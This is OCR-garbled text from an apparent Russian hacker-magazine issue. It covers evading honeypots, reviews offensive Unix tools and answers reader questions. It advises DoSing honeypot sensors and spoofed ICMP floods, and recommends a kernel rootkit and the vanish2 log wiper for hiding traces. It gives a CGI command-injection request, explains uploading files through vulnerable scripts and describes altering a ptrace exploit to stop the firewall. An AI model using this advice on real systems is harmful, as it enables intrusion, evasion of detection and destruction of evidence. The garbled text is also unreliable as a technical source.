ном из узлов данного сегмента ло- 
кальной сети, так и являться маршру- 
тизатором, расположенным перед 
приманкой. Иногда сетевой сенсор 
совмещается непосредственно с са- 
мой приманкой. Это существенно уп- 
рощает и удешевляет систему honey- 
рога, однако ослабляет ее иммунитет 
(захватив управление приманкой, ата- 
кующий быстро обнаружит сенсор и 
сделает ему харакири). Размещение 
сенсора внутри широковещательного 
сегмента обеспечивает ему наиболь- 
шую скрытость. Сетевой интерсрейс 
сенсора может и не иметь собственно- 
го [Р-адреса, прослушивая трафик в 
Stealth-pexkume, что достигается путем 
физического обрезания передающе- 
го провода на сетевой карте (см. 
статью о сниферах в этом номере). 
Маршрутизатор в этом смысле намно- 
го более заметен, однако определить, 
работает ли на нем сетевой сенсор 
или нет, в общем случае невозможно. 

Дампы tcpdump'a обрабатываются 
различными анализаторами (напри- 
мер, IDS), во-первых, распознающими 
сам сракт атаки, а, во-вторых, опреде- 
ляющими [Р-адрес нарушителя. Нака- 
пываемая информация оседает в кол- 
лекторе, сердцем которого является 
база данных. Это самое уязвимое мес- 
то honeypot'a. Необходимо заранее 
выбрать четкие критерии, позволяю- 
щие однозначно определить, какие 
действия являются нормальными, а 
какие - нет. В противном случае адми- 
нистратор будет либо постоянно дер- 
гаться, вздрагивая от каждого скани- 
рования портов, либо пропустит слег- 
ка видоизмененный вариант извест- 
ной атаки. Есть и другая проблема. Ес- 
ли приманка не имеет никакого gpyro- 
го трафика, кроме хакерского (что пег- 
ко определить по характеру измене- 
ния поля ID в заголовках 1Р-пакетов, 


подробнее о котором рассказывается 
в статье о брандмауэрах), TO атакую- 
щий немедленно распознает ловушку 
и не станет ее атаковать. Если же при- 
манка обслуживает пользователей 
внешней сети, непосредственный ана- 
лиз дампа трасфика становится невоз- 
можным и хакеру ничего не стоит за- 
теряться на доне легальных запро- 
сов. Достаточно эффективной при- 
манкой являются базы данных с номе- 
рами кредитных карт или другой кон- 
сфриденциальной информацией (есте- 
ственно, подложной). Всякая попытка 
обращения к такому срайлу, равно как 
и использование похищенной инерор- 
мации на практике, недвусмысленно 
свидетельствует о взломе. Существу- 
юти другие способы поимки наруши- 
телей, но все они так или иначе сво- 
дятся к жестким шаблонам, а значит, в 
принципе, не способны распознать ха- 
керов с нетривиальным мышлением. 

Короче говоря, опытный взломщик 
может обойти Попеурогы. Попробуем 
разобраться как. 


СРЫВАЯ ВУАЛЬ ТЬМЫ 

и Прежде чем бросаться в бой, 
взломщику необходимо тщательно 
изучить своего противника: рекон- 
струировать топологию сети, опре- 
делить места наибольшего скопле- 
ния противодействующих сил и, ес- 
тественно, попытаться выявить все 
honeypot'bl. Основным оружием ха- 
кера на этой стадии атаки будет ска- 
нер портов, работающий через "не- 
мой" узел и потому надежно скрыва- 
ющий |Р-адрес атакующего. 

Явно уязвимые сервера лучше сра- 
зу отбросить - с высокой степенью 
вероятности среди них присутствуют 
honeypot'bl, дотрагиваться до кото- 
рых небезопасно. Исключение сос- 
тавляют публичные сервера компа- 
ний, расположенные в DMZ-30He - 
совмещать их honeypot'om никому не 
придет в голову, правда, на них 
вполне может работать IDS. 

Безопаснее всего атаковать рабо- 
чие станции корпоративной сети, 
расположенные за брандмауэром 
(если такой действительно есть). Ве- 
роятность нарваться на honeypot ми- 
нимальна. К несчастью для атакую- 


щего, рабочие станции содержат 
намного меньше дыр, чем серверные 
приложения, а потому атаковать 
здесь особенно и нечего. 


ОТВЛЕКАЮЩИЕ МАНЕВРЫ 

и Выбрав жертву, следует не сразу 
приступать к атаке. Вначале стоит убе- 
диться, что основные признаки honey- 
рога отсутствуют: узел обслуживает 
внешний трасрик, имеет коноригура- 
цию, отличную от конфигурации по 
умолчанию, легально используется 
остальными участниками сети и т.д. 
Теперь для нагнетания психологичес- 
кого напряжения нужно интенсивно 
сканировать порты, засылая на неко- 
торые из них различные бессмыслен- 
ные, но внешне угрожающие строки, 
имитируя атаку на переполнение бу- 
cpepa. Тогда администратору будет не 
так-то просто разобраться, имело ли 
место реальное переполнение буфера 
или нет, и если имело, то каким именно 
запросом осуществлялось. 

Естественно, артобстрел необходи- 
мо вести через защищенный канал. 


АТАКА НА НОМЕУРОТ 

и Будучи по своей природе обычным 
узлом сети, honeypot подвержен раз- 
личным Ооб-атакам. Наиболее уязвим 
сетевой сенсор, обязанный прослуши- 
вать весь проходящий трасрик. Если 
удастся вывести его из игры, факт 
вторжения в систему на некоторое вре- 
мя останется незамеченным. Естествен- 
но, атакуемый узел должен остаться 
живым, иначе некого атаковать. Будем 
исходить из того, что сенсор принимает 
все пакеты. Тогда, послав пакет на не- 
существующий или любой ненужный 
узел, мы завалим противника. 

Как вариант, можно наводнить сеть 
$УМ-пакетами или вызвать ЕСНО- 
death (шторм ICMP-nakeTos, направ- 
ленный на жертву с нескольких де- 
сятков мощных серверов, что достига- 
ется спуфингом IP-agpecos). 

Саму же атаку лучше всего осуще- 
ствлять поверх протоколов, устой- 
чивых к перехвату траффика и под- 
держивающих прозрачное шифро- 
вание, ослепляющее сетевой сен- 
сор. Чаще всего для этой цели ис- 
пользуется SSH (Secure Shell), одна- 
ко OH ограничивает выбор атакую- 
щего только явно поддерживающи- 
ми его узлами, что сводит на нет 
весь выигрыш от шифрования. 


ЗАКЛЮЧЕНИЕ 

m= Сила ПопеуроЁ ов - в их новизне 
и неизученности. У хакеров пока нет 
адекватных методик противостояния, 
но не стоит думать, что такая расста- 
новка сил сохранится и в дальней- 
шем. Архитектура honeypot'os плохо 
проработана и уязвима. Уже сегодня 
опытному взломщику ничего не сто- 
ит обойти их, завтра же это будет 
уметь каждый подросток, установив- 
ший *nix и, презрев мышь, взявший- 
ся за клавиатуру. a 
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Боевой софт 
Обзор хакерского сосрта для *nix 


ГАО 


Спрашивали? Отвечаем! 


Глоссарий 
Основные понятия по взлому *мх- 
систем 


МЕВ 


Полезные ресурсы интернета 


Books 


Обзор интересной литературы 
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ОБЗОР ХАКЕРСКОГО СОФТА ДЛЯ *NIX 


С уществует огромное количество различного хакерского софта для 
никсов. Это и переборщики паролей, и сканеры портов, и сниферы, и 
руткиты, и, и, и... Как выбрать наиболее подходящий? Читай этот обзор! 


KNOCKERS 
(WWW.KNOCKER.SOURCE- 
FORGE.NET) 


[>> Очень прос- 
той, но чрезвычайно 
функциональный сканер 
портов. Размер дистрибу- 
тива - всего 72 килобайта. 


Собирается на любой 
УМХ-ПКе-машине с по- 


мощью трех стандартных 
команд. Вся работа проис- 
ходит из консоли. Скорость 
работы просто феноме- 
нальная. Много режимов 
сканирования: сканирова- 
ние одного порта, группы 
портов, всех возможных 
портов. Показывает не 
только номер открытого 
порта, но и сервис, скры- 
тый за ним. Очень удобно 
использовать именно этот 
сканер при анализе с уда- 
ленной машины: встроена 
опция, позволяющая отп- 
равлять весь вывод в от- 
дельный файл. 

Минусы. Давно не обнов- 
лялся. Нет возможности 
изучать сразу несколько 
машин или всю сеть. Нель- 
зя сканировать ЦОР-порты. 
Используется сканирова- 
ние "в лоб", то есть твои 
исследования могут быть 
легко обнаружены бди- 
тельным админом. 


Cocptuna опре- 
деленно заслуживает твое- 
го внимания. Это малень- 
кая, но незаменимая утили- 
та в арсенале хакера. Со 
сканированием ТСР-портов 
удаленного хоста она 
справляется хорошо. 


WEB PASSWORD CHECKER 
(WPC) V 0.1 (WWW.DOWN- 
LOADS.SECURITYFOCUS.CO 
M/TOOLS/WPC- 
0_1B.TAR.GZ) 


Утилита, предназна- 
[> ченная для перебора 
паролей меЬ-страниц. При- 
годится тебе, когда нужно 
подобрать связку логин- 
пароль для формы регист- 
рации. 

Возможна работа 
через прокси-сервер. Прог- 
рамма способна искать па- 
роли как по словарю, так и 
брутфорсом. Есть возмож- 
ность "растягивать", то 
есть делать паузы между 
попытками, что позволяет 
дольше оставаться неза- 
меченным. WPC пытается 
использовать общеизвест- 
ные механизмы трансфор- 
мации логина и получен- 
ный мод скармливает cpop- 
ме в качестве пароля; есть 
возможность задать уро- 
вень сложности. Примером 
такого запроса может слу- 
жить вариант: логин - root, 
пароль - toor (root! и T.g.), 
это одна из самых простых 
связок, выдаваемых прог- 
раммой. 

Минусы. Непродуман 
брутфорс-механизм - нет 


возможности ограничить 
используемые символы па- 
роля, что резко сократило 
бы время поиска. Не nog- 
держивается SSL, а, 3Ha- 
чит, атака на многие серви- 
сы невозможна (тот же 
Webmin). 

Сразу видно, что 
программа имеет очень ши- 
рокий диапазон примене- 
ния. Удобно использовать 
эту софтину для взлома 
чатов, почтовых ящиков. 
Но подобрать пароли на 
защищенных страницах 
невозможно. 


ЕТТЕВСАР 
(WWW.ETTERCAP.SOURCE- 
FORGE.NET) 


y) | Твоему вни- 
манию предлагается 
свободно распространяе- 
мый снифер с кучей воз- 
можностей. Разработанный 
механизм плагинов делает 
этот инструмент очень гиб- 
ким и расширяемым. Так, 
если в базовой конфигура- 
ции мы имеем только «ню- 
хача», то дополнительные 
модули позволяют проге 
выполнять функции поис- 
ковика другого Ettercap’a 
(вдруг администратор-пара- 
ноик и сам снифает локаль 
в поисках хакеров!) и т.д. 
Просмотреть все подклю- 
ченные плагины можно, от- 
дав команду “ettercap -р 
list". Кроме Toro, снифер 
привлекателен своим гра- 


фическим интерфейсом 
(УМХ начал активно ис- 
пользовать красивые фей- 
сы). Отображая все компь- 
ютеры, найденные в сети, 
программа предлагает тебе 
выбрать необходимые для 
изучения хосты и действия 
на них. Если где-то тормо- 
зишь - снифер имеет обра- 
ботчик кнопочки “Е 1”. До- 
полнительно Ettercap мо- 
жет определять удаленную 
систему, используя отпе- 
чатки из базы птар. 

Минусы. Возможна работа 
только с eth, a PPP и lo не 
поддерживаются. Хотя 
практического интереса в 
этих двух интерфейсах нет, 
но кто сказал, что мы не хо- 
тим тренироваться на своей 
машине? 

Вердикт. Программа опре- 
деленно достойна твоего 
внимания. Попробовать, 
изучить, сохранить в ло- 
кальном арсенале - вот 
путь данной софтины. 


ETHEREAL 
(WWW.ETHEREAL.COM) 


Эта утилита по функ- 

циональности похожа 
Ha Ettercap, но имеет неко- 
торые необходимые фичи. 

Плюсы. Основным отли- 

чием Ethereal является gtk- 
Базе-интерфейс. Еще соф- 
тина поддерживает не 
только е{В-интерфейсы, но 
и lo c PPP. Если говорить о 
функциональности, то и 
тут сканер на высоте: име- 
ется не только очень прос- 
тая и мощная система 
фильтров, которая заметно 
облегчает процесс сбора 
информации, но и способ- 
ность объединения отдель- 
ных пакетов в документы 
(БЕт-странички, электрон- 
ные письма). Кстати, край- 
не полезная штука: авто- 
матически собранные стра- 
нички сейвятся на локаль- 
ном диске, и, поставив на 
ночь снифер, ты сможешь 
просмотреть утром, где же 
были твои соседи. С этого 
момента все порноресурсы 
интернета станут для тебя 
бесплатными ;-). 


Минусы. Пока не реали- 
зовано соединения пакетов 
1СО-протокола, но это мож- 
но объяснить особен- 
ностью транспортировки 
сообщения. 

Вердикт. Советую скачать 
этот снифер, сравнить его с 
конкурентом и выбрать, что 
тебе понравится больше. 
Программа очень мощная, 
особенно если изучить ру- 
KOBOQCTBO и man. 


SCANSSH V2.0 (WWW.MON- 
KEY.ORG/~PROVOS/SCANSS 


Scanssh 


Сосфтина сканит ло- 

кальную сеть в поис- 
ках запущенных демонов 
SSH и определяет версию 
сервера. 

Плюсы. Маленькая ути- 
литка делает огромную ра- 
боту по упрощению изуче- 
ния сетей. Таким образом, с 
помощью этого приложе- 
ния в течение нескольких 
минут можно просмотреть 
всю локалку и получить IP 
хостов, на которых запу- 
щенны сервисы SSH. Но са- 
мое главное назначение - 
это определение версии де- 
мона. После такого анали- 
за, рассматривая логи, 
можно легко найти жертву 
для взлома. 

Минусы. Обновляется не- 
достаточно часто, и, как ре- 
зультат, не все сервера оп- 
ределяются корректно. 

Вердикт. Софтина должна 
сопровождать хакера в его 
нелегком пути. Очень часто 
определяющую роль в ус- 
пешности взлома играет 
скорость опознавания баж- 
ных сервисов, а эта прог- 
рамма и www.bugtrag.org 
сделают это максимально 
быстро. 


NESSUS V 2.1.1 (WWW.NES- 
SUS.ORG) 


Считается одной из 

самых лучших прог- 
рамм для анализа удален- 
ных систем. 

Плюсы. Модульность, 
постоянное обновление, 
доступность исходных ко- 
дов, простота использова- 
ния, малое количество 
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Nessus 


ложных срабатываний ge- 
лают Nessus лучшим по- 
мощником как администра- 
тора, так и хакера. Вот ин- 
тереснейшая цитата по 
этому приложению: « Про- 
дукт Nessus получил сер- 
тификат Гостехкомиссии 
при Президенте РФ на со- 
ответствие представлен- 
ной версии продукта заяв- 
ленным техническим ха- 
рактеристикам». Хорошо 
развитая система Plug-in 
позволяет назвать этот 
комплекс однозначным ли- 
дером среди сканеров бе- 
зопасности для UNIX-like- 
систем. Один из лучших 
сканеров не только по 
юзабельности, но и по ин- 
терфейсу. Программа име- 
ет красивый и простой 
фейс, в лучших традициях 
9{К-Базе-программ. Разра- 
ботчики не забывают и 
поддерживают свое дети- 
ще: практически сразу 
после сообщения о новой 
уязвимости Nessus уже мо- 
жет определять ее. Поэто- 
му иногда именно эта прог- 
рамма используется вмес- 
то птар для изучения ата- 
куемого хоста. 

Минусы. Программа для 
локального использова- 
ния, то есть использовать 
в походных боевых усло- 
виях ее вряд ли удастся 
из-за размера и необхо- 
димых библиотек-зависи- 
мостей. 

Вердикт. Must have. Дос- 
таточно один раз поста- 
вить и изучить это прило- 
жение, после чего ты пой- 
мешь, почему практичес- 
ки все админы считают 
программу лучшей в сво- 
ем классе. 


SECURITY 
ADMINISTRATOR'S 
INTEGRATED NETWORK 
TOOL V5.5 
(WWW.SAINTCORPORA- 
TION.COM) 


Коммерческий ска- 

нер безопасности 
для UNIX-like-nnatqpopm. К 
сожалению, не бесплатен, 
но это компенсируется тем, 
что использовать его не 
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для коммерческих целей 
можно вполне свободно. 

Плюсы. Программа осно- 
вана на легендарном 
ЗАТАМ'е (он же SANTA -)), 
но в отличии от своего 
прародителя постоянно об- 
новляется и совершен- 
ствуется. Основными плю- 
сами можно считать скани- 
рование через фаерволы, 
возможность обновления 
баз уязвимостей через ин- 
тернет, высокая скорость 
работы. Все взаимодей- 
ствие с программой осуще- 
ствляется через меБ-ин- 
терфейс. То есть для рабо- 
ты SAINT просто необходи- 
мо на машине иметь брау- 
зер, можно даже тексто- 
вой. Кроме этого, для гене- 
рации выводов необходим 
Perl, так как он служит ос- 
новным языком создания 
динамических страниц в 
данном ПО. В целом, тесты 
этой софтины показали 
очень даже интересные 
результаты: при исследо- 
вании машин иногда нахо- 
дят такие уязвимости и 
сервисы, о которых многие 
аналогичные программы 
молчат. А если включить 
смекалку и посмотреть в 
каталог с установленным 
SAINT, то можно заметить 
папочку bin, где лежат за- 
пускные файла анализато- 
ра. Их можно оттуда поза- 
имствовать и использовать 
как маленькие и автоном- 
ные утилиты хакера ;-) ( 
правда, это уже другая ис- 
тория, но намек понял?). 

Минусы. Эту программу 
также сложно назвать по- 
ходным инструментом ха- 
кера - размер около 2,5 
мегабайт, да и браузер, 
интерпретатор Рег! для 
работы... Платная, что су- 
жает область использова- 
ния ПО, ведь не будешь 
же ты на каждый сканиру- 
емый хост заказывать 
свой ключ! 

Вердикт. Неплохо бы 
иметь. Хоть и платный, но 
есть и свободно доступ- 
ные реализации. Работа с 
программой очень удоб- 
ная и эффективная, прав- 
да, только на стационар- 


ной машине, где все наст- 
роено и отточено. Кроме 
этого, есть целый склад 
мини-утилит, которые 
просто грех не применить 
в жизни отдельно от все- 
го комплекса. 


SAINT. Начинаем работать 


ММАР 3.55 
(WWW.INSECURE.ORG) 


Nmap. К бою! 


Вот добрались и go 

суперпопулярного 
анализатора сетей. Пожа- 
луй, это самый популярный 
сканер-уневерсал как сре- 
ди юниксоидов, так и среди 
виндузятников. 

Плюсы. Самый главный 
плюс - превосходный поис- 
ковик открытых портов с 
огромным количеством оп- 
ций для настройки. Вот да- 
леко не полный список воз- 
можностей: сканирование 
диапазонов |IP-agpecos, це- 
лых подсетей, стелс-скани- 
рование портов. Сканиро- 
вание портов с установкой 
адреса возврата, то есть 
происходит корректировка 
заголовка !Р-пакета, что 
очень удобно при наличии 
2 сетевых карт на машине. 
Стелс-сканирование и 
простой механизм ТСР- 
подключений, первый спо- 
соб доступен только поль- 
зователю root, что легко 
можно объяснить с точки 
зрения [Т-безопасности. 
Программа позволяет так- 
же эффективно изучать 
удаленный хост и по UDP- 
протоколу. Если говорить о 
сканировании подсетей, то 
есть возможность провести 
простой ping-scan и таким 
образом найти включенные 
машины. Как и у младших 
собратьев, у данной сосфти- 
ны имеется возможность 
сканирования произволь- 
ного диапазона портов, вы- 
вод подробных данных в 
свой лог-файл. Сканер go- 
полнен хорошим механиз- 


мом определения удален- 
ной операционной системы. 
Очень сильные способы оп- 
ределения серверов, вися- 
щих на определенных пор- 
тах хоста. Программа ищет 
демона на порту и узнает 
его версию с точностью до 
третьего знака (например, 
OpenSSH 3.6.1), что просто 
не может не радовать скри- 
пткидисов. За счет встроен- 
ного fingerprinting'a nmap 
превращается в мощный 
комплекс анализа хостов в 
сети. С каждой новой вер- 
сией пополняется база дан- 
ных отпечатков различных 
систем, и уже сейчас птар 
определяет не только вер- 
сию Виндов, но и номер яд- 
ра, если это Мпих-машина. 

Минусы. Размер, как у и 
любого комплекса сетевого 
анализа птар, достаточно 
большой. Хотя и соверше- 
нствуется способ "снятия 
отпечатков", все еще дос- 
таточно часто приходится 
получать аналогичные это- 
му выводы программы: 
"Это точно Винда. Версия? 
Или Миллениум, или 2к 
сервер, возможно, и 2K ag- 
ванс-сервер, хотя похоже 
на ХР, даже вроде с пер- 
вым сервиспаком". При 
этом Linux определяется 
достаточно четко. 

Вердикт. Однозначный 
must have. Любой удален- 
ный анализ сильно упро- 
щается при использовании 
этой софтины. Программа 
считается одной из основ- 
ных утилит хакера. 


YAKRK - YET ANOTHER 
KERNEL ROOTKIT 
(WWW.ROBOTA.NET/DOWN- 
LOAD ?FILE=93) 


Эта утилита предс- 

тавляет собой набор 
руткитов для ядер 2.4. 
Вполне интересная софти- 
на, тем более если учесть, 
что все еще очень многие 
сервера крутятся на ядрах 
серии 2.4. 

Плюсы. Основной плюс 
набора - минимальное из- 
менение системной конфи- 
гурации. Работает прило- 
жение на уровне ядра, пе- 
рехватывая некоторые сис- 
темные вызовы ОС. 


Минусы. Пока возмож- 
ности этого руткита очень 
ограниченны. Он способен 
лишь скрывать сетевую 
активность некоторых при- 
ложений. 

Если нужно ус- 
тановить маленький и 
очень простой руткит - это 
ПО для тебя. Неплохо, ког- 
да эта софтина лежит у те- 
бя в боекомплекте, но и 
без нее можно спокойно 
обойтись ;-). 


VANISH2 
(HTTP://PACKETSTORMSE- 
CURITY.ORG/UNIX/PENE- 
TRATION/LOG- 
WIPERS/VANISH2.TGZ) 


Одна из самых необ- 

ходимых утилит на 
захваченной машине - чис- 
тильщик лог-файлов. Пос- 
ле долгих и упорных тестов 
я предлагаю использовать 
Vanish2. 

В архиве обнаружился 
только файл кода на язы- 
ке Си хедер. Добавить 
таке программистам уже 
не хватило сил, поэтому 
компилировать программу 
следует так: “gcc vanish2.c 
-o vanish2”. 

Очень грамотная 
чистка как текстовых, так и 
бинарных логов всей систе- 


мы. Основное внимание 
следует обратить на чистки 
журналов messages, secure 
и httpd.access_log. С этой 
задачей ПО справилось 
очень хорошо: все чисто и 
ровно. Также к сильной 
стороне чистильщика сле- 
дует отнести и отсутствие 
временных файлов после 
работы, они создаются во 
время чистки, но удаляются 
по ее завершении. Если 
процесс будет прибит, а 
анализ журнала не закон- 
чен, то останутся времен- 
ные файлы, по которым 
можно вычислить, что ра- 
ботал логвайпер. Отсут- 
ствовали и соге-файлы, то 
есть после работы в систе- 
ме не остается практически 
никаких следов. 

Минусы. Пожалуй, един- 
ственный недостаток - это 
скорость работы. Полный 
анализ двухнедельных ло- 
гов сервера занял около 10 
минут. 

Must have. Луч- 
ший чистильщик из всех 
предложенных. С задачей 
сокрытия следов твоей дея- 
тельности справится очень 
хорошо, правда, затратив 
на это уйму времени. 


SENDIP 
(HTTP://WWW.EARTH.LI/P 
ROJECTPURPLE/PROGS/SE 
NDIP.HTML) 


[>> Размер 
очень маленький, а 
возможности интересные. 
Главная задача данного 
ПО - это отправлять паке- 


ты на определенный IP с 
измененным адресом возв- 


рата. Возможность отправ- 
ки пакетов от других IP- 
адресов поможет тебе 
скрыть свою активность в 
сети. Например, если поя- 
вятся признаки того, что 
тебя засекли, просто за- 
пускаешь программу, ука- 
зываешь ей необходимые 
параметры... В результате 
на жертву обрушиваются 
пакеты как будто от впол- 
не миролюбивого хоста, 
что легко может сбить с 
толку админа. Но следует 
учитывать, что правильно 
расставленные админом 
сниферы выдадут тебя с 
потрохами «благодаря» 
этой софтине. 

Минусы. Очень общие 
настройки параметров ис- 
ходящих пакетов, что не 
позволяет использовать 
эту программу против гра- 
мотных админов и !Т-спе- 
циалистов. 

Если намечает- 
ся атака на защищенный 
УМХ-хост, то запастись 
программой крайне жела- 
тельно. При правильном 
использовании удастся 
сбить с толку подавляю- 
щее большинство адми- 
нистраторов. Запас беды 
не чинит, поэтому не по- 
ленись скачать, скомпи- 
лить и научиться пользо- 
ваться данной програм- 
мой - на войне все сред- 
ства хороши. 


ease) 


PATH (PERL ADVANCED 
TCP HIJACKING) 
(WWW.P-A-T-H.SOURCE- 
FORGE.NET) 


Это целый набор ха- 

кера, написанный на 
языке Perl. Для работы goc- 
таточно иметь на машине 
интерпретатор Perl, и уже 
можно исследовать сети. 

В дистрибутиве, 
датированном 09.11.2003, 
содержатся следующие 
утилиты: программа-генера- 
тор произвольных пакетов, 
неплохой снифер, ICMP и 
АБР-роутер. Что интересно, 
этот комплекс комплектует- 
ся как консольной версией, 
так несложным СУ|-интер- 
фейсом. Нас, прежде всего, 
интересует консоль, кото- 
рая реализована очень хо- 
рошо. А функциональности 
всего комплекса я бы пос- 
тавил твердую "троечку". 
Просто аналогичных утилит 
очень много, причем они 
включаются как в состав 
целых комплексов, так и 
плавают по интернету в ви- 
де отдельных бинарников. 
Основной плюс (а часто ми- 
нус) этого комплекта - это 
использование интерпрети- 
руемого языка для выпол- 
нения своей работы. 

Минусы. Требуется инте- 
рпретатор Perl. 

Если тебя инте- 
ресуют маленькие и могу- 
чие программы на Рег! или 
твоя задача - разобраться 
с работой сниферов, то 
этот набор для тебя. Если 
нет - его легко можно заме- 
нить бинарниками, описан- 
ными выше. ЧЕ 
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- HY ГДЕ МОЙ КРЯКЕР ИНТЕРНЕТА? 


- АТЫ ЗАПУСТИ ЕХЕ-ШНИК ИЗ АТТАЧА! 


НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ WWW.XAKEP.RU 
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FAQ 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru 


СПРАШИВАЛИ? ОТВЕЧАЕМ! 


Функцию пересылки 
логов поддерживает 
демон syslogd. Во-пер- 
вых, обрати внимание 
на процесс сервиса. 
Если он запущен с па- 
раметром -$$, можешь 
не волноваться - пере- 
сылки логов нет. Если 
параметры опущены, 
загляни в 
/etc/syslog.conf и пои- 
щи подстроку «@ag- 
рес_системы». Если та- 
ковая имеется, можно 
сделать вывод, что ло- 
ги пересылаются на 
сторонний сервер в ав- 
томатическом режиме. 


Существует несколько 
способов заливки фай- 
лов через уязвимые 
скрипты. Даже если на 
сервере отсутствует 
wget, проверь наличие 
fetch или get. Можно ис- 
пользовать ЕТР-сцена- 
рий и вытянуть нужный 
файл через /usr/bin/ftp. 
При этом используй оп- 
цию -п, чтобы передать 
логин и пароль в одной 
строке. Сам сценарий 
запиши построчно в 
файл с помощью коман- 
ды /bin/echo. 
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Сканирование портов - 
нарушение порядка в 
сети. Ты можешь воз- 
мутиться, мол, я же ни- 
чего не сделал - просто 
посмотрел состояние 
портов. В лучшем слу- 
чае админ удаленного 
сервера ничего не за- 
метит, но, если на сер- 
вере стоит утилита, 
отслеживающая скан, 
сисадм может пресечь 
твою деятельность, от- 
писав провайдеру. Час- 
то у провайдера имеет- 
ся так называемый рег- 
ламент, в котором есть 
пункт, оговаривающий 
сканирование. Так что, 
учитывая серьезность 
ситуации, тебя могут 
отключить от сети. 
Впрочем, физическое 
отключение - довольно 
редкое явление, но все 
же A рекомендую ска- 
нировать порты с уда- 
ленного шелла кон- 
сольной программой 
(например, птар’ом). 


Да, такие услуги ока- 
зываются. Например, 
компания Positive 
Technologies (\////.015е- 
сути) предлагает 
взломать сервер всего 
за $1000. Сотрудники 
компании пытаются 
хакнуть заказчика, по- 
лучить там шелл и ста- 
щить конфиденциаль- 


ную информацию, ко- 
торая бы являлась go- 
казательством того, что 
взлом удался. Эта ус- 
луга была названа 
«penetration testing». 
Естественно, прове- 
рить свой сервер на 
дырки - удовольствие 
дорогое. Клиентами 
займутся сотрудники 
РТи SecurityLab. Они 
гарантируют абсолют- 
ную конфиденциаль- 
ность и полноту тести- 
рования. На рынке при- 
сутствуют и другие 
компании: Digital 
Security (www.dsec.ru), 
НПО "Информзащита" 
(wwwinosec.ru). Впрочем, 
можно пойти другим 
путем - пригласить зна- 
комого хакера, если та- 
ковой имеется. 


Искать бэкапы. Рутки- 
ты, выполненные в ви- 
де прекомпиленных би- 
нарных файлов, нена- 
дежны. То есть вполне 
возможно, что кит не 
переварится новыми 
глибсами. Бывает, что 
бинарник объявит об 
отсутствии какой-либо 
библиотеки, а иногда 
может вообще не за- 
пуститься. В этом слу- 
чае ищи бэкап системы 
на другом носителе ли- 
бо вручную переуста- 
навливай испорченные 
файлы. А затем вос- 
пользуйся другим рут- 
китом, на основе LKM, 
например. 


Это очень полезная 
штука! LKM - Linux 
Kernel Module, руткит, 
построенный Ha нем, 
представляет собой на- 
бор ядерных модулей, 
которые после загруз- 
ки перехватывают сис- 
темные вызовы, стира- 
ют себя из списка мо- 
дулей ит.д. Преимуще- 
ство налицо: руткит не 
заменяет никаких ‹фай- 
лов, поэтому даже пос- 
ле переустановки би- 
нарников хакерские 
модули будут работать. 
Только вот незадача: 
существует сост, KOTO- 
рый позволяет увидеть 
установленный в сис- 
теме 1КМ-руткит. 


В списке переменных 
окружения присутству- 
ет так называемая пус- 
тая строка SIFS. Ее и 
следует использовать 
в запросе. То есть, ес- 
ли бажный скрипт 
file.cgi имеет параметр 
file, принимающий 
лишь одно слово, рек- 
вест будет выглядеть 
следующим образом: 
http://host.com/cgi- 
bin/file.cgi?file=|unameSIF 
S-al. 


В этом случае нужно 
оформлять статичес- 
кую прописку ARP- 
таблицы. Но, раз уж 
ты заговорил о фаер- 
воле, поделюсь прави- 
лом, которое привя- 
жет нужный IP-agpec 
к МАС. Это достигает- 
ся при помощи модуля 
mac.so. Рулес будет 
выглядеть следующим 
образом: 


iptables -A INPUT -s 
192.168.0.1 -m mac --mac- 
source 00:C0:DF:10:19:FB -j 
ACCEPT. 


При желании ты мо- 
жешь указать параметр 
-mac-desitination, чтобы 
разрешить соединение 
с узлом, имеющим оп- 
ределенный МАС. 


Есть один верный спо- 
соб, определяющий ле- 


вых юзеров даже пос- 
ле зачистки логов. Вы- 
полни команду Is -la 
/dev/pts и сравни чис- 
ло открытых псевдоу- 
стройств с числом ак- 
тивных юзеров. Если 
ты обнаружишь пару 
лишних псевдотерми- 
налов, знай, что на тво- 
ей машине хостится ха- 
кер :). Правда, некото- 
рые процессы, напри- 
мер radius, берут для 
себя pts, но это исклю- 
чение из правил. 


Еще как! Для этого ха- 


керу нужны минималь- 
ные права, а также 
дырка в сервере :). До- 
пустим, на машине кру- 
тится бажное ядро, а 
взломщик имеет доступ 
к Web-lwenny. Чтобы 
деактивировать cpaep- 
вол, он заливает на 
сервер рЁгасе-эксплоит 


(либо какой-нибудь 
другой) со слегка изме- 
ненным кодом. Вместо 
запуска /bin/sh будет 
стартоваться сценарий, 
который обращается к 
/etc/init.d/iptables с па- 
раметром stop. Как 
правило, запуск внеш- 
ней команды не выно- 
сится в Shell-Kog, так 
что исправить сишник 
сможет даже темный 
человек :). После ком- 
пиляции и запуска 
сплоита фаервол дол- 
жен выключиться. 


На машине могут сто- 
ять утилиты, тестирую- 
щие систему на безо- 
пасность. Обращай 
внимания на запущен- 
ные программы trip- 
wire, portcentry, раз- 
личные IDS, а также Ha 
программу chkrootkit, 
которая может и не 
светиться в процесс- 
листе. 


Ни в коем случае не 
удаляй /var/log/wtmp, 
так как администратор 
сразу почует нелад- 
ное. Выбери другой 
логклинер. Дело в 
том, что логвайпер, 
который ты использу- 
ешь, начинает искать 
записи с начала фай- 
ла. Однако в сети мно- 
го чистильщиков, ко- 
торые ставят указа- 
тель в конец wtmp, а 
затем начинают по- 
иск. Такой алгоритм 
используется, напри- 
мер, в утилите grlog- 
wipe. Бьюсь об зак- 
лад, что ты юзаешь 
vanish2, так как имен- 
но он очищает Wimp с 
самого начала. 


На ум сразу приходит: 
тебя взломали. Тести- 
руй сервер на наличие 
руткитов и выявляй 
злоумышленника. Ха- 
кер, видимо, прописал 
в конфиг руткита мас- 
ку, под которую попал 
системный срайл. В ре- 
зультате этого файл 
исчез из поля зрения 
15. Впрочем, такая ано- 
малия может возник- 
нуть, если на винте 
имеются бэды. На вся- 
кий случай запусти 
fsck и удостоверься, 
что файловая система 
в норме. 


Ты наткнулся на МО5- 
хэши. МО5 является 
необратимым алгорит- 
мом, поэтому един- 
ственный способ рас- 
шифровать пароль - 
воспользоваться прог- 
раммой-брутфрорсером. 
Таких программ много, 
могу порекомендовать 
md5crack и md5inside. 
Вторая софтина имеет 
графический интер- 
фейс и поддерживает 
потоки, так что рас- 
шифровка займет не 
очень много времени. 


Да, к сожалению, тебя 
взломали. Файл, кото- 
рый ты обнаружил, яв- 
ляется частью системы 
для проведения DDoS. 
Иными словами, твою 
машину попросту зом- 
бировали через баг в 
httpd. Немедленно уда- 
ли этот файл и переус- 
танови Apache на более 
